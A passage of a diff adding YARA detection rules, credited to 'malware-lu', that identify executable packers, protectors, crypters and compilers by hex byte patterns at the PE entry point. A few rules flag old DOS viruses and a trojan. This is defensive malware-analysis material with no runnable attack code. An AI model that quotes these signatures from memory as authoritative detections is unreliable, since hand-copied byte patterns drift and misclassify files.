+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 10 12 41 00 68 F4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XPack167
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 8C D3 15 33 75 81 3E E8 0F 00 9A E8 F9 FF 9A 9C EB 01 9A 59 80 CD 01 51 9D EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv1xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 2C 53 56 33 F6 57 56 89 75 DC 89 75 F4 BB A4 9E 40 00 FF 15 60 70 40 00 BF C0 B2 40 00 68 04 01 00 00 57 50 A3 AC B2 40 00 FF 15 4C 70 40 00 56 56 6A 03 56 6A 01 68 00 00 00 80 57 FF 15 9C 70 40 00 8B F8 83 FF FF 89 7D EC 0F 84 C3 00 00 00 }
+	$a1 = { 83 EC 0C 53 56 57 FF 15 20 71 40 00 05 E8 03 00 00 BE 60 FD 41 00 89 44 24 10 B3 20 FF 15 28 70 40 00 68 00 04 00 00 FF 15 28 71 40 00 50 56 FF 15 08 71 40 00 80 3D 60 FD 41 00 22 75 08 80 C3 02 BE 61 FD 41 00 8A 06 8B 3D F0 71 40 00 84 C0 74 0F 3A C3 74 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule BobSoftMiniDelphiBoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 }
+	$a1 = { 55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8 }
+	$a2 = { 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule UltraProV10SafeNet
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A1 ?? ?? ?? ?? 85 C0 0F 85 3B 06 00 00 55 56 C7 05 ?? ?? ?? ?? 01 00 00 00 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv1242v1243
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 09 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack121build0909Method2bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 8A 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Obsidium13037ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxPhoenix927
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 5E 81 C6 ?? ?? BF 00 01 B9 04 00 F3 A4 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite14c199899IanLuck
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorV10CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 35 14 00 00 E9 31 13 00 00 E9 98 12 00 00 E9 EF 0C 00 00 E9 42 13 00 00 E9 E9 02 00 00 E9 EF 0B 00 00 E9 1B 0D 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RECryptv07xCruddRETh2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 55 81 04 24 0A 00 00 00 C3 8B F5 81 C5 ?? ?? 00 00 89 6D 34 89 75 38 8B 7D 38 81 E7 00 FF FF FF 81 C7 48 00 00 00 47 03 7D 60 8B 4D 5C 83 F9 00 7E 0F 8B 17 33 55 58 89 17 83 C7 04 83 C1 FC EB EC 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PassEXEv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 1E 0E 0E 07 1F BE ?? ?? B9 ?? ?? 87 14 81 ?? ?? ?? EB ?? C7 ?? ?? ?? 84 00 87 ?? ?? ?? FB 1F 58 4A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RECryptv07xCruddRETh1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 61 60 E8 00 00 00 00 5D 55 81 04 24 0A 00 00 00 C3 8B F5 81 C5 ?? ?? 00 00 89 6D 34 89 75 38 8B 7D 38 81 E7 00 FF FF FF 81 C7 48 00 00 00 47 03 7D 60 8B 4D 5C 83 F9 00 7E 0F 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WIBUKeyV410Ahttpwibucomus
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 05 ?? ?? ?? ?? FF 00 00 00 75 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Mew501NorthFoxHCC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01ExeSmasherAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C FE 03 90 60 BE 90 90 41 90 8D BE 90 10 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 FE 0B E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler12C12Dp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 05 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 ?? 3A ?? ?? E8 ?? EC FF FF 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? D7 FF FF E8 ?? ?? FF FF B8 20 ?? ?? ?? 33 C9 BA 04 01 00 00 E8 ?? DB FF FF 68 04 01 00 00 68 20 ?? ?? ?? 6A 00 FF 15 10 ?? ?? ?? BA ?? ?? ?? ?? B8 14 ?? ?? ?? E8 ?? ?? FF FF 85 C0 0F 84 ?? 04 00 00 BA 18 ?? ?? ?? 8B 0D 14 ?? ?? ?? E8 ?? ?? FF FF 8B 05 88 ?? ?? ?? 8B D0 B8 54 ?? ?? ?? E8 ?? E3 FF FF B8 54 ?? ?? ?? E8 ?? E2 FF FF 8B D0 B8 18 ?? ?? ?? 8B 0D 88 ?? ?? ?? E8 ?? D6 FF FF FF 35 34 ?? ?? ?? FF 35 30 ?? ?? ?? FF 35 3C ?? ?? ?? FF 35 38 ?? ?? ?? 8D 55 E8 A1 88 ?? ?? ?? E8 ?? F0 FF FF 8B 55 E8 B9 54 }
+
+condition:
+		$a0
+}
+	
+	
+rule AlexProtectorv04beta1byAlex
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 C7 83 C4 04 33 C9 E8 01 00 00 00 68 83 C4 04 E8 01 00 00 00 68 83 C4 04 B9 ?? 00 00 00 E8 01 00 00 00 68 83 C4 04 E8 00 00 00 00 E8 01 00 00 00 C7 83 C4 04 8B 2C 24 83 C4 04 E8 01 00 00 00 A9 83 C4 04 81 ED 3C 13 40 00 E8 01 00 00 00 68 }
+
+condition:
+		$a0
+}
+	
+	
+rule UG2002Cruncherv03b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FishPEShield101HellFish
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8B 45 10 83 C0 0C 8B 00 89 45 DC 83 7D DC 00 75 08 E8 AD FF FF FF 89 45 DC E8 C1 FE FF FF 8B 10 03 55 DC 89 55 E4 83 C0 04 8B 10 89 55 FC 83 C0 04 8B 10 89 55 F4 83 C0 04 8B 10 89 55 F8 83 C0 04 8B 10 89 55 F0 83 C0 04 8B 10 89 55 EC 83 C0 04 8B 00 89 45 E8 8B 45 E4 8B 58 04 03 5D E4 8B FB 8B 45 E4 8B 30 4E 85 F6 72 2B 46 C7 45 E0 00 00 00 00 83 7B 04 00 74 14 }
+	$a1 = { 60 E8 12 FE FF FF C3 90 09 00 00 00 2C 00 00 00 ?? ?? ?? ?? C4 03 00 00 BC A0 00 00 00 40 01 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 00 00 00 00 8A 00 00 00 10 00 00 28 88 00 00 40 ?? 4B 00 00 00 02 00 00 00 A0 00 00 18 01 00 00 40 ?? 4C 00 00 00 0C 00 00 00 B0 00 00 38 0A 00 00 40 ?? 4E 00 00 00 00 00 00 00 C0 00 00 40 39 00 00 40 ?? 4E 00 00 00 08 00 00 00 00 01 00 C8 06 00 00 40 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01Neolite20Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 A6 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEIntrov10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 9C 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 45 40 ?? 80 BD 67 44 40 ?? ?? 0F 85 48 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidiumv1250ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DevC4992BloodshedSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 ?? ?? ?? 00 E8 C8 FE FF FF 90 8D B4 26 00 00 00 00 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 ?? ?? ?? 00 E8 A8 FE FF FF 90 8D B4 26 00 00 00 00 55 8B 0D ?? ?? ?? 00 89 E5 5D FF E1 8D 74 26 00 55 8B 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV119DllLZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 C7 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 49 0B 00 00 EB 0C 8B 85 45 0B 00 00 89 85 49 0B 00 00 8D B5 6D 0B 00 00 8D 9D 2F 03 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 DA 0A 00 00 89 85 41 0B 00 00 E8 76 01 00 00 EB 20 60 8B 85 49 0B 00 00 FF B5 41 0B 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 C7 08 83 3C 37 00 75 DA 83 BD 55 0B 00 00 00 74 0E 83 BD 59 0B 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 DA 0A 00 00 89 85 69 0B 00 00 5B 60 FF B5 41 0B 00 00 56 FF B5 69 0B 00 00 FF D3 61 8B B5 69 0B 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 E9 98 00 00 00 56 FF 95 D2 0A 00 00 89 85 61 0B 00 00 85 C0 0F 84 C8 00 00 00 8B C6 EB 5F 8B 85 65 0B 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 65 0B 00 00 C7 00 20 20 20 00 EB 06 FF B5 65 0B 00 00 FF B5 61 0B 00 00 FF 95 D6 0A 00 00 85 C0 0F 84 87 00 00 00 89 07 83 C7 04 8B 85 65 0B 00 00 EB 01 40 80 38 00 75 FA 40 89 85 65 0B 00 00 66 81 78 02 00 80 74 A1 80 38 00 75 9C EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 80 3E 01 0F 85 5F FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 69 0B 00 00 FF 95 DE 0A 00 00 68 00 40 00 00 68 00 20 0C 00 FF B5 41 0B 00 00 FF 95 DE 0A 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XJXPALLiNSoN
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? 40 00 68 ?? ?? 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 44 53 56 57 66 9C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov220b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 30 12 41 00 68 A4 A5 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptor20Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 ?? ?? ?? ?? F7 D1 83 F1 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SentinelSuperProAutomaticProtectionv641Safenet
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A1 ?? ?? ?? ?? 55 8B ?? ?? ?? 85 C0 74 ?? 85 ED 75 ?? A1 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 55 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 15 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 6A 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 01 00 00 00 5D C2 0C 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TMTPascalv040
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 1F 06 8C 06 ?? ?? 26 A1 ?? ?? A3 ?? ?? 8E C0 66 33 FF 66 33 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02CrunchPEHeuristicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 0E 00 00 00 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeMSVCDLLMethod4emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 56 57 BF 01 00 00 00 8B 75 0C 85 F6 5F 5E 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcAsmProtectorV10XVcAsm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VBOXv42MTE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C E0 0B C5 8C E0 0B C4 03 C5 74 00 74 00 8B C5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeUPX0896102105124emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphiMicrosoftVisualC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }
+	$a1 = { C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxHafen809
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 1C ?? 81 EE ?? ?? 50 1E 06 8C C8 8E D8 06 33 C0 8E C0 26 ?? ?? ?? 07 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117LZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 73 26 00 00 8D 9D 58 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01LTC13Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectv141
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 76 03 77 01 7B 74 03 75 01 78 47 87 EE E8 01 00 00 00 76 83 C4 04 85 EE EB 01 7F 85 F2 EB 01 79 0F 86 01 00 00 00 FC EB 01 78 79 02 87 F2 61 51 8F 05 19 38 01 01 60 EB 01 E9 E9 01 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV1031AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 74 72 42 00 8B D5 81 C2 C3 72 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3F A9 42 00 81 E9 6E 73 42 00 8B D5 81 C2 6E 73 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 98 2E 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock096tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 59 E4 FF FF 00 00 00 00 00 00 00 ?? ?? ?? ?? EE ?? ?? 00 00 00 00 00 00 00 00 00 0E ?? ?? 00 FE ?? ?? 00 F6 ?? ?? 00 00 00 00 00 00 00 00 00 1B ?? ?? 00 06 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 ?? ?? 00 00 00 00 00 39 ?? ?? 00 00 00 00 00 26 ?? ?? 00 00 00 00 00 39 ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WerusCrypter10byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB E8 12 40 00 80 33 05 E9 7D FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HEALTHv51byMuslimMPolyak
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E E8 ?? ?? 2E 8C 06 ?? ?? 2E 89 3E ?? ?? 8B D7 B8 ?? ?? CD 21 8B D8 0E 1F E8 ?? ?? 06 57 A1 ?? ?? 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCGuardv303dv305d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 50 E8 ?? ?? ?? ?? 5D EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxNovember17768
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? 50 33 C0 8E D8 80 3E ?? ?? ?? 0E 1F ?? ?? FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoTinyPascalBeRo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 20 43 6F 6D 70 69 6C 65 64 20 62 79 3A 20 42 65 52 6F 54 69 6E 79 50 61 73 63 61 6C 20 2D 20 28 43 29 20 43 6F 70 79 72 69 67 68 74 20 32 30 30 36 2C 20 42 65 6E 6A 61 6D 69 6E 20 27 42 65 52 6F 27 20 52 6F 73 73 65 61 75 78 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateexeProtector21522XSetiSoftTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Protectorv1111DDeMPEEnginev09DDeMCIv092
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 56 E8 00 00 00 00 5B 81 EB 08 10 00 00 8D B3 34 10 00 00 B9 F3 03 00 00 BA 63 17 2A EE 31 16 83 C6 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01XCR011Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 8B F0 33 DB 83 C3 01 83 C0 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Trivial173bySMTSMF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? ?? 28 54 72 69 76 69 61 6C 31 37 33 20 62 79 20 53 4D 54 2F 53 4D 46 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv11MTE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WARNINGTROJANRobinPE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PiCryptor10byScofield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 57 31 C0 89 45 EC B8 40 1E 06 00 E8 48 FA FF FF 33 C0 55 68 36 1F 06 00 64 FF 30 64 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 31 C0 E8 4E F4 FF FF 8B 45 EC E8 F6 F7 FF FF 50 E8 CC FA FF FF 8B D8 83 FB FF 74 4E 6A 00 53 E8 CD FA FF FF 8B F8 81 EF AC 26 00 00 6A 00 6A 00 68 AC 26 00 00 53 E8 DE FA FF FF 89 F8 E8 E3 F1 FF FF 89 C6 6A 00 68 28 31 06 00 57 56 53 E8 AE FA FF FF 53 E8 80 FA FF FF 89 FA 81 EA 72 01 00 00 8B C6 E8 55 FE FF FF 89 C6 89 F0 09 C0 74 05 E8 A8 FB FF FF 31 C0 }
